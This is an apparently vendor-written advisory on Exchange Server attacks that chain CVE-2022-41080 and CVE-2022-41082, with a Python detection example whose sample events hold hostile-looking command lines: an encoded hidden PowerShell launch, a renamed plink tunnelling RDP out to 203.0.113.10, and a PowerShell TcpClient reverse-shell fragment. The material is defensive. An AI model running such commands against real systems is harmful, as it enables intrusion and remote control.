22 Dec / 2022
Microsoft Exchange Server 2013, 2016 and 2019 (on-premises) servers that have not installed the November 8, 2022 Security Update (KB5019758). Exchange Online is not affected.
There has been an increase in attacks against on-premises Exchange Servers that rely on Microsoft's URL Rewrite mitigation as their only defence against the ProxyNotShell vulnerabilities (CVE-2022-41040 and CVE-2022-41082). That mitigation blocks the Autodiscover request pattern used by CVE-2022-41040; it does not block the Outlook Web Access (OWA) path, so it is not a substitute for the patch.
Threat actors are chaining CVE-2022-41080 and CVE-2022-41082 to gain access to networks and deploy ransomware.
Attackers use the SSRF vulnerability CVE-2022-41080 to reach the backend PowerShell remoting service through OWA, a route the URL Rewrite rule does not cover.
Once the PowerShell service is reachable, CVE-2022-41082 is exploited to execute arbitrary commands on the server.
System Administrators are advised to:
Attacker Technique - PowerShell Registry Cradle
Suspicious Process - PowerShell System.Net.Sockets.TcpClient
Suspicious Process - Exchange Server Spawns Process
PowerShell - Obfuscated Script
Webshell - IIS Spawns PowerShell
Attacker Technique - Plink Redirecting RDP
Attacker Technique - Renamed Plink
Suspicious Process - Started From Users Music Directory
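The detection names listed above describe process-level behaviours. As an added example that is not part of the original advisory or of any vendor's rule set, the Python below encodes six of them as simple predicates and runs them over constructed Sysmon-style process-creation events. The event field names (ParentImage, Image, OriginalFileName, CommandLine), the sample values and the matching heuristics are assumptions chosen to illustrate what each rule name implies, not a reproduction of anyone's production logic.

```python
"""Toy detection logic for the rule names above (added example, not from the advisory).

Events are constructed to resemble Sysmon Event ID 1 (process create); the field
names and values are assumptions, not real telemetry from an incident.
"""
import ntpath
import re
from typing import Callable, Dict, List

Event = Dict[str, str]

# Constructed sample events (not real incident data).
SAMPLE_EVENTS: List[Event] = [
    # Webshell-style: the IIS worker process launches an encoded PowerShell command.
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE",
     "CommandLine": "powershell -nop -w hidden -enc SQBFAFgA..."},
    # Renamed plink in a user's Music folder tunnelling RDP out over 443.
    # The PE's OriginalFileName survives the rename; that is what the rule keys on.
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Users\svc_exch\Music\svchost.exe",
     "OriginalFileName": "plink.exe",
     "CommandLine": r"svchost.exe -N -R 3389:127.0.0.1:3389 -P 443 user@203.0.113.10 -pw hunter2"},
    # Benign control: an interactive user opening Notepad.
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "OriginalFileName": "NOTEPAD.EXE",
     "CommandLine": "notepad.exe"},
    # Reverse-shell style one-liner spawned from IIS.
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE",
     "CommandLine": "powershell -c \"$c=New-Object System.Net.Sockets.TcpClient('203.0.113.10',4444)\""},
]

SHELLS = {"powershell.exe", "pwsh.exe"}
# -e / -ec / -enc / -encodedcommand followed by a base64-looking blob.
ENCODED_FLAG = re.compile(r"(?i)(^|\s)-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{8,}")
# plink -R [listen-port:]host:3389 : a remote forward that exposes RDP.
RDP_REMOTE_FWD = re.compile(r"\s-R\s+\S*:3389(?=\s|$)")
MUSIC_DIR = re.compile(r"(?i)^[a-z]:\\users\\[^\\]+\\music\\")


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return ntpath.basename(path).lower()


def tcpclient_in_powershell(e: Event) -> bool:
    return _base(e["Image"]) in SHELLS and "system.net.sockets.tcpclient" in e["CommandLine"].lower()


def obfuscated_script(e: Event) -> bool:
    return _base(e["Image"]) in SHELLS and bool(ENCODED_FLAG.search(e["CommandLine"]))


def iis_spawns_powershell(e: Event) -> bool:
    return _base(e["ParentImage"]) == "w3wp.exe" and _base(e["Image"]) in SHELLS


def plink_redirecting_rdp(e: Event) -> bool:
    return e.get("OriginalFileName", "").lower() == "plink.exe" and bool(RDP_REMOTE_FWD.search(e["CommandLine"]))


def renamed_plink(e: Event) -> bool:
    return e.get("OriginalFileName", "").lower() == "plink.exe" and _base(e["Image"]) != "plink.exe"


def started_from_music_dir(e: Event) -> bool:
    return bool(MUSIC_DIR.match(e["Image"]))


# Rule name -> predicate, in the order the advisory lists them.
RULES: Dict[str, Callable[[Event], bool]] = {
    "Suspicious Process - PowerShell System.Net.Sockets.TcpClient": tcpclient_in_powershell,
    "PowerShell - Obfuscated Script": obfuscated_script,
    "Webshell - IIS Spawns PowerShell": iis_spawns_powershell,
    "Attacker Technique - Plink Redirecting RDP": plink_redirecting_rdp,
    "Attacker Technique - Renamed Plink": renamed_plink,
    "Suspicious Process - Started From Users Music Directory": started_from_music_dir,
}


def evaluate(event: Event) -> List[str]:
    """Names of every rule that fires on one event."""
    return [name for name, fn in RULES.items() if fn(event)]


def triage(events: List[Event]) -> Dict[int, List[str]]:
    """Index -> fired rules, for events that fired at least one rule."""
    hits = {i: evaluate(e) for i, e in enumerate(events)}
    return {i: names for i, names in hits.items() if names}


if __name__ == "__main__":
    for idx, names in triage(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["Image"], "->", names)
```

Keying the plink rules on OriginalFileName rather than the on-disk name is the point of the "Renamed Plink" entry: the version-resource name is what a renamed binary still carries. The predicates are deliberately narrow; a production rule would also want the parent's application pool for Exchange-specific IIS workers and a broader list of script hosts.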
Cythera Vulnerability Management clients are being actively scanned for vulnerable instances of Microsoft Exchange.